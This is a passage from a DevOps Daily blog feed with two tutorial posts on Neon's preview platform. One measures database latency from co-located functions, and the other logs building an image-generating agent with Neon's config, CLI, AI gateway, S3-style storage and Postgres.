          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-function-is-a-normal-web-handler"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>There is nothing Neon-specific in the application code. It is a standard <a href="https://hono.dev">Hono</a> app talking to Postgres through a connection pool, the same code you would write for any Node host:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { <span class="hljs-title class_">Hono</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono&#x27;</span>;
<span class="hljs-keyword">import</span> { drizzle } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/node-postgres&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">Pool</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { parseEnv } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/env&#x27;</span>;
<span class="hljs-keyword">import</span> config <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;../neon&#x27;</span>;
<span class="hljs-keyword">import</span> { todos } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;./db/schema&#x27;</span>;

<span class="hljs-keyword">const</span> env = <span class="hljs-title function_">parseEnv</span>(config);
<span class="hljs-keyword">const</span> pool = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Pool</span>({ <span class="hljs-attr">connectionString</span>: env.<span class="hljs-property">postgres</span>.<span class="hljs-property">databaseUrl</span>, <span class="hljs-attr">max</span>: <span class="hljs-number">5</span> });
<span class="hljs-keyword">const</span> db = <span class="hljs-title function_">drizzle</span>(pool);

<span class="hljs-keyword">const</span> app = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Hono</span>();
app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/todos&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; c.<span class="hljs-title function_">json</span>(<span class="hljs-keyword">await</span> db.<span class="hljs-title function_">select</span>().<span class="hljs-title function_">from</span>(todos)));
app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/todos&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">const</span> { text } = <span class="hljs-keyword">await</span> c.<span class="hljs-property">req</span>.<span class="hljs-property">json</span>&lt;{ <span class="hljs-attr">text</span>: <span class="hljs-built_in">string</span> }&gt;();
  <span class="hljs-keyword">const</span> [row] = <span class="hljs-keyword">await</span> db.<span class="hljs-title function_">insert</span>(todos).<span class="hljs-title function_">values</span>({ text }).<span class="hljs-title function_">returning</span>();
  <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>(row, <span class="hljs-number">201</span>);
});

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> app;
</code></pre><p>After <code>neonctl deploy</code>, that handler answers at a branch-scoped URL, and the create/read path works end to end:</p>
<pre><code class="hljs language-bash">curl -X POST <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/todos&quot;</span> -H <span class="hljs-string">&#x27;content-type: application/json&#x27;</span> -d <span class="hljs-string">&#x27;{&quot;text&quot;:&quot;ship it&quot;}&#x27;</span>
<span class="hljs-comment"># {&quot;id&quot;:1,&quot;text&quot;:&quot;ship it&quot;,&quot;createdAt&quot;:&quot;2026-06-25T16:17:10.692Z&quot;}  (201)</span>
curl <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/todos&quot;</span>
<span class="hljs-comment"># [{&quot;id&quot;:1,&quot;text&quot;:&quot;ship it&quot;,&quot;createdAt&quot;:&quot;2026-06-25T16:17:10.692Z&quot;}]  (200)</span>
</code></pre><p>The phrase &quot;branch-scoped URL&quot; is the part worth slowing down on. Open a branch off this one and it gets its own function at its own URL, running your latest code against that branch&#39;s data. The preview environment for a pull request stops being &quot;the frontend plus a shared backend&quot; and becomes a real, isolated copy. We will spend a whole post on that later; for now, the point is that the function and the branch are one unit.</p>
<h2 id="h2-now-measure-the-distance" class="group relative scroll-mt-24">
        <a href="#h2-now-measure-the-distance" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Now measure the distance
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-now-measure-the-distance"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Here is the part you can put a number on. The function exposes a <code>/db-latency</code> endpoint that times thirty <code>SELECT 1</code> round trips from inside the handler and returns the median. Because the function runs in the same region as the branch, this is the local hop:</p>
<pre><code class="hljs language-bash">curl <span class="hljs-string">&quot;<span class="hljs-variable">$URL</span>/db-latency&quot;</span>
<span class="hljs-comment"># { &quot;from&quot;: &quot;neon function (us-east-2, co-located with Postgres)&quot;,</span>
<span class="hljs-comment">#   &quot;runs&quot;: 30, &quot;min_ms&quot;: 1.13, &quot;median_ms&quot;: 1.19, &quot;p95_ms&quot;: 1.62 }</span>
</code></pre><p>Just over a millisecond. Then I ran the exact same <code>SELECT 1</code>, against the exact same database, from a machine in Europe (this site&#39;s build box, a Raspberry Pi a long way from <code>us-east-2</code>):</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># same query, same database, from a machine on another continent</span>
<span class="hljs-comment"># { &quot;from&quot;: &quot;europe -&gt; us-east-2&quot;, &quot;runs&quot;: 30,</span>
<span class="hljs-comment">#   &quot;min_ms&quot;: 130.46, &quot;median_ms&quot;: 134.54, &quot;p95_ms&quot;: 138 }</span>
</code></pre><p>Same query, same database. The only thing that changed is where the caller sits.</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Median time for one SELECT 1 round trip&quot;,&quot;unit&quot;:&quot;ms&quot;,&quot;caption&quot;:&quot;Median of 30 round trips to the same Neon Postgres (us-east-2), warm connection. 'From the function' runs inside Neon Functions, co-located with the branch. 'From Europe' is a machine on another continent. Your own gap depends on where your compute runs, but distance is latency.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;From the function (us-east-2)&quot;,&quot;value&quot;:1.19},{&quot;label&quot;:&quot;From Europe&quot;,&quot;value&quot;:134.54}]}"></div><p>About 113x. And that is for one round trip. A request that reads a session, loads a user, fetches their settings, and runs three more queries pays that distance once per query if it runs them in sequence. At 1.2 ms the six-query endpoint spends roughly 7 ms talking to the database; at 135 ms it spends most of a second, and no amount of application tuning fixes it, because the time is in the network. This is the tax co-located compute removes. It is also where a lot of &quot;serverless Postgres is slow&quot; folklore actually comes from: not the database, but a function in one region reconnecting to a database in another on every cold start.</p>
<p>To be fair about the comparison: a real deployment is rarely as far away as Europe-to-Virginia. If your Lambda and your database are both in <code>us-east-1</code> the gap is smaller. But &quot;both in the same region&quot; is exactly the property Neon Functions give you by default instead of by careful configuration, and &quot;smaller&quot; is not &quot;zero.&quot;</p>
<h2 id="h2-what-it-is-and-what-it-is-not" class="group relative scroll-mt-24">
        <a href="#h2-what-it-is-and-what-it-is-not" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What it is, and what it is not
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-what-it-is-and-what-it-is-not"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>A few things are worth stating plainly before you build around this, because it is a private preview and it has clear edges.</p>
<div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><strong>Private preview, one region, new projects only.</strong> Everything is in AWS <code>us-east-2</code> and only works on projects created inside the preview. You cannot turn this on for an existing production database today.</p>
</div></div></div><p>Beyond that:</p>
<ul>
<li><strong>These are request/response functions, not a job runner.</strong> They are built for APIs, agents, webhooks, and real-time connections (they support streaming and long-lived sockets, not just quick replies). Background work, queues, retries, and schedules are a different kind of compute; pair them with something like Inngest or QStash.</li>
<li><strong>Function memory is fixed</strong> (2048 MiB at preview), so this is not yet a knob-for-everything compute platform.</li>
<li><strong>It is a Neon-shaped commitment.</strong> One config file declaring your functions is convenient precisely because it is integrated. That is coupling, traded for the locality and the branching.</li>
</ul>
<h2 id="h2-who-this-is-for" class="group relative scroll-mt-24">
        <a href="#h2-who-this-is-for" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Who this is for
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-who-this-is-for"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>If your backend already lives in mature infrastructure-as-code with compute and database carefully placed in the same region, Neon Functions are not solving a problem you have. You already paid the cost to make the hop short.</p>
<p>The teams this helps are the ones who never got around to that: side projects and small teams whose compute and database drifted into different regions because nobody decided otherwise, and anyone who wants a pull request to spin up a genuinely isolated backend without wiring it by hand. For them, &quot;the function runs next to the database, on this branch&#39;s data, at this URL&quot; is a real reduction in both latency and moving parts, and it is the default rather than a configuration you have to get right.</p>
<p>We dig into the bigger picture in <a href="https://devops-daily.com/posts/neon-backend-platform-not-just-postgres">Neon is becoming a backend platform, not just Postgres</a>, and the rest of this series walks through the other things a branch-scoped function unlocks: streaming agents, MCP servers, and preview environments that include the backend. The full demo, including the <code>/db-latency</code> endpoint, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-functions-demo"></div>]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[I Gave an AI Agent a Database, Compute, Storage, and Models From One CLI]]></title>
      <link>https://devops-daily.com/posts/ai-agent-stack-one-cli-neon-platform</link>
      <description><![CDATA[An AI agent usually needs four accounts: a database, somewhere to run, object storage, and a model provider. I wired all four from a single Neon credential and had a deployed image-generating agent in a few minutes. Here is the actual build log, the config that ties it together, and the honest caveats.]]></description>
      <pubDate>Fri, 26 Jun 2026 13:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/ai-agent-stack-one-cli-neon-platform</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[serverless]]></category><category><![CDATA[postgres]]></category><category><![CDATA[platform-engineering]]></category>
      <content:encoded><![CDATA[<p>A working AI agent has an unglamorous shopping list. It needs a database to remember things, somewhere to run that can stream tokens without timing out, object storage for whatever it produces, and access to a model. Assembled the usual way, that is four separate signups: a Postgres host, a compute platform, an S3 bucket, and an OpenAI or Anthropic account, each with its own credential to provision, inject, and rotate per environment.</p>
<p>Neon&#39;s June 2026 platform preview collapses that list. The pitch is that the database, the compute, the storage, and the model gateway all come from one account and branch together. I wanted to know if that was real or a slide, so I built the canonical example end to end: an image-generating agent that takes a prompt, calls a model, stores the result, and indexes it in Postgres. This is the build log, with the real commands and output, and the parts where the preview still shows.</p>
<p>(Companion repo: <a href="https://github.com/The-DevOps-Daily/neon-ai-agent">The-DevOps-Daily/neon-ai-agent</a>. Everything below ran against a fresh project created while writing.)</p>
<h2 id="h2-one-command-to-scaffold-the-whole-stack" class="group relative scroll-mt-24">
        <a href="#h2-one-command-to-scaffold-the-whole-stack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          One command to scaffold the whole stack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-one-command-to-scaffold-the-whole-stack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>Neon ships starter templates through its CLI. The image agent is one of them:</p>
<pre><code class="hljs language-bash">neonctl bootstrap ./ai-agent --template ai-sdk
</code></pre><p>That scaffolds 26 files: a Hono function, a Drizzle schema, a <code>neon.ts</code> config, and (a nice touch) a <code>.agents/skills/</code> directory with skill docs for the AI assistant you are probably using to edit the project. Neon bundles agent instructions for its own products, which tells you who this template is aimed at.</p>
<p>The file that matters is <code>neon.ts</code>. It is the entire backend declared in one object:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neondatabase/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">aiGateway</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">buckets</span>: {
      <span class="hljs-attr">images</span>: {},
    },
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">imagegen</span>: {
        <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;AI SDK image agent&#x27;</span>,
        <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span>,
      },
    },
  },
});
</code></pre><p>Three lines of intent: turn on the AI gateway, give me a bucket called <code>images</code>, and deploy <code>src/index.ts</code> as a function. No connection strings, no bucket ARNs, no model API keys. Those get filled in later, automatically.</p>
<h2 id="h2-linking-creates-the-project-deploying-creates-everything-else" class="group relative scroll-mt-24">
        <a href="#h2-linking-creates-the-project-deploying-creates-everything-else" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Linking creates the project, deploying creates everything else
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-linking-creates-the-project-deploying-creates-everything-else"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p><code>neon link</code> creates and attaches a Neon project. The new platform features are private preview, so there are two constraints worth stating up front: everything is in AWS <code>us-east-2</code>, and it only works on projects created inside the preview. Your existing Neon databases do not grow these features in place.</p>
<p>Then <code>neon deploy</code> reads <code>neon.ts</code> and provisions the declared services. Here is the whole sequence, link through deploy:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;link + deploy&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;create the project (us-east-2, preview only)&quot;},{&quot;cmd&quot;:&quot;neonctl link --project-name ai-agent --region-id aws-us-east-2&quot;,&quot;output&quot;:&quot;Created project (\&quot;ai-agent\&quot;) in aws-us-east-2 and linked .neon on branch main&quot;},{&quot;comment&quot;:&quot;read neon.ts and provision everything it declares&quot;},{&quot;cmd&quot;:&quot;neonctl deploy&quot;,&quot;output&quot;:&quot;Applied changes\n  create  service  bucket:images\n  create  service  function:imagegen\n\nFunction URLs\n  imagegen: https://br-green-star-...-imagegen.compute.c-3.us-east-2.aws.neon.tech/\n\nUtilized services: Postgres, Object Storage, Functions, AI Gateway\nPulled 11 Neon variables into .env.local&quot;}]}"></div><p>That last line is the actual product. Eleven environment variables (the <code>DATABASE_URL</code>, the S3 access key/secret/endpoint, and the AI gateway token and base URL) all written for me, all scoped to this branch. The four credentials I would normally collect from four dashboards arrived from one <code>deploy</code>.</p>
<h2 id="h2-the-model-call-one-credential-any-provider" class="group relative scroll-mt-24">
        <a href="#h2-the-model-call-one-credential-any-provider" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The model call: one credential, any provider
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-the-model-call-one-credential-any-provider"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The AI Gateway is OpenAI-compatible. Your existing SDK works by changing only the base URL, so the same chat completion against the cheapest catalog model looks like this in whatever you already use:</p>
<div class="post-tabs not-prose" data-tabs="{&quot;title&quot;:&quot;Same gateway call, three SDKs (only the base URL changes)&quot;,&quot;tabs&quot;:[{&quot;label&quot;:&quot;curl&quot;,&quot;lang&quot;:&quot;bash&quot;,&quot;code&quot;:&quot;curl \&quot;$NEON_AI_GATEWAY_BASE_URL/ai-gateway/mlflow/v1/chat/completions\&quot; \\\n  -H \&quot;Authorization: Bearer $NEON_AI_GATEWAY_TOKEN\&quot; \\\n  -d '{\&quot;model\&quot;:\&quot;gpt-5-nano\&quot;,\&quot;messages\&quot;:[\n        {\&quot;role\&quot;:\&quot;user\&quot;,\&quot;content\&quot;:\&quot;What is Neon branching?\&quot;}]}'&quot;},{&quot;label&quot;:&quot;Python&quot;,&quot;lang&quot;:&quot;python&quot;,&quot;code&quot;:&quot;from openai import OpenAI\n\nclient = OpenAI(base_url=GATEWAY_URL, api_key=GATEWAY_TOKEN)\nclient.chat.completions.create(\n    model=\&quot;gpt-5-nano\&quot;,\n    messages=[{\&quot;role\&quot;: \&quot;user\&quot;, \&quot;content\&quot;: \&quot;What is Neon branching?\&quot;}],\n)&quot;},{&quot;label&quot;:&quot;Node&quot;,&quot;lang&quot;:&quot;javascript&quot;,&quot;code&quot;:&quot;import OpenAI from 'openai';\n\nconst client = new OpenAI({ baseURL: GATEWAY_URL, apiKey: GATEWAY_TOKEN });\nawait client.chat.completions.create({\n  model: 'gpt-5-nano',\n  messages: [{ role: 'user', content: 'What is Neon branching?' }],\n});&quot;}]}"></div><p>Hitting it once returns exactly what you would expect from the model:</p>
<pre><code class="hljs language-json"><span class="hljs-punctuation">{</span>
  <span class="hljs-attr">&quot;model&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;gpt-5-nano-2025-08-07&quot;</span><span class="hljs-punctuation">,</span>
  <span class="hljs-attr">&quot;choices&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">[</span><span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;message&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-punctuation">{</span> <span class="hljs-attr">&quot;role&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;assistant&quot;</span><span class="hljs-punctuation">,</span>
    <span class="hljs-attr">&quot;content&quot;</span><span class="hljs-punctuation">:</span> <span class="hljs-string">&quot;Neon Postgres branching creates lightweight, independent
      clones of a running database that can be developed in isolation...&quot;</span> <span class="hljs-punctuation">}</span><span class="hljs-punctuation">}</span><span class="hljs-punctuation">]</span>
<span class="hljs-punctuation">}</span>
</code></pre><p>The same token reaches around 25 models across Anthropic, OpenAI, Google, and a few open-source providers. You move between them by changing one <code>model</code> string. There is no separate OpenAI or Anthropic account in this project. The published prices look like each provider&#39;s own list rate, so the gateway reads as pass-through with the convenience of a single credential:</p>
<div class="post-chart not-prose" data-chart="{&quot;type&quot;:&quot;bar&quot;,&quot;title&quot;:&quot;Output price per 1M tokens, a few AI Gateway models&quot;,&quot;unit&quot;:&quot;$&quot;,&quot;caption&quot;:&quot;List prices from the Neon AI Gateway catalog (models.dev), June 2026. One endpoint and one credential reach all of them; you change a single model field to move across this range.&quot;,&quot;rows&quot;:[{&quot;label&quot;:&quot;gpt-5-nano&quot;,&quot;value&quot;:0.4},{&quot;label&quot;:&quot;gemini-2.5-flash&quot;,&quot;value&quot;:2.5},{&quot;label&quot;:&quot;claude-haiku-4.5&quot;,&quot;value&quot;:5},{&quot;label&quot;:&quot;claude-opus-4.5&quot;,&quot;value&quot;:25}]}"></div><p>The point is not the specific numbers, it is that &quot;use a cheap model in CI and a frontier model in prod&quot; becomes a config value rather than a second vendor integration.</p>
<h2 id="h2-storage-that-the-function-can-reach-with-the-normal-s3-sdk" class="group relative scroll-mt-24">
        <a href="#h2-storage-that-the-function-can-reach-with-the-normal-s3-sdk" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Storage that the function can reach with the normal S3 SDK
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-storage-that-the-function-can-reach-with-the-normal-s3-sdk"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The <code>images</code> bucket is plain S3 as far as your code is concerned. The injected <code>AWS_*</code> variables point the standard AWS SDK at a branch-scoped endpoint, so this just works inside the function with no custom client:</p>
<pre><code class="hljs language-ts"><span class="hljs-keyword">const</span> s3 = <span class="hljs-keyword">new</span> <span class="hljs-title function_">S3Client</span>({ <span class="hljs-attr">forcePathStyle</span>: <span class="hljs-literal">true</span> });
<span class="hljs-keyword">await</span> s3.<span class="hljs-title function_">send</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">PutObjectCommand</span>({
  <span class="hljs-title class_">Bucket</span>: <span class="hljs-string">&#x27;images&#x27;</span>, <span class="hljs-title class_">Key</span>: key, <span class="hljs-title class_">Body</span>: jpeg, <span class="hljs-title class_">ContentType</span>: <span class="hljs-string">&#x27;image/jpeg&#x27;</span>,
}));
<span class="hljs-keyword">const</span> url = <span class="hljs-keyword">await</span> <span class="hljs-title function_">getSignedUrl</span>(s3, <span class="hljs-keyword">new</span> <span class="hljs-title class_">GetObjectCommand</span>({ <span class="hljs-title class_">Bucket</span>: <span class="hljs-string">&#x27;images&#x27;</span>, <span class="hljs-title class_">Key</span>: key }));
</code></pre><p>I confirmed it directly: a <code>PutObject</code> then <code>GetObject</code> round-tripped, and the presigned URL came back on a host scoped to the branch (<code>br-green-star-….storage.c-3.us-east-2.aws.neon.tech</code>). That branch scoping is the part you cannot get by bolting an external S3 bucket onto a database: open a branch and its files fork with it, so a preview environment never writes into production&#39;s objects.</p>
<h2 id="h2-putting-it-together-the-agent-runs" class="group relative scroll-mt-24">
        <a href="#h2-putting-it-together-the-agent-runs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Putting it together: the agent runs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-putting-it-together-the-agent-runs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The function is a small handler. It streams a model response, and when the model calls its image-generation tool, it uploads the JPEG to the bucket, inserts a row in Postgres, and returns a presigned URL. Calling the deployed agent:</p>
<pre><code class="hljs language-bash">curl -X POST <span class="hljs-string">&quot;<span class="hljs-variable">$IMAGEGEN_URL</span>&quot;</span> -H <span class="hljs-string">&#x27;content-type: application/json&#x27;</span> \
  -d <span class="hljs-string">&#x27;{&quot;messages&quot;:[{&quot;role&quot;:&quot;user&quot;,
       &quot;content&quot;:&quot;Draw a small minimalist server rack icon, flat style&quot;}]}&#x27;</span>
</code></pre><p>The response streams back as the agent narrates and draws, and afterward the side effects are all there. The object is in the bucket, and the row is in Postgres pointing at it:</p>
<pre><code> id |              prompt               |             bucket_key              | bytes
----+-----------------------------------+-------------------------------------+-------
  2 | Draw a small minimalist server... | generated/ed49b102-…-f8c46e2f8c16.jpg | 47372
  1 | Draw a small minimalist server... | generated/9125d5b4-…-63b54a892695.jpg | 47372
</code></pre><p>From an empty directory to a deployed agent that generates an image, stores it, and indexes it in Postgres took a few minutes and exactly one credential. The model call, the file write, and the database insert were all wired by the platform, not by me.</p>
<h2 id="h2-where-it-still-shows-the-preview" class="group relative scroll-mt-24">
        <a href="#h2-where-it-still-shows-the-preview" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where it still shows the preview
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-where-it-still-shows-the-preview"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><p>The build was smooth, but it is private preview and a few seams are worth knowing before you plan around it.</p>
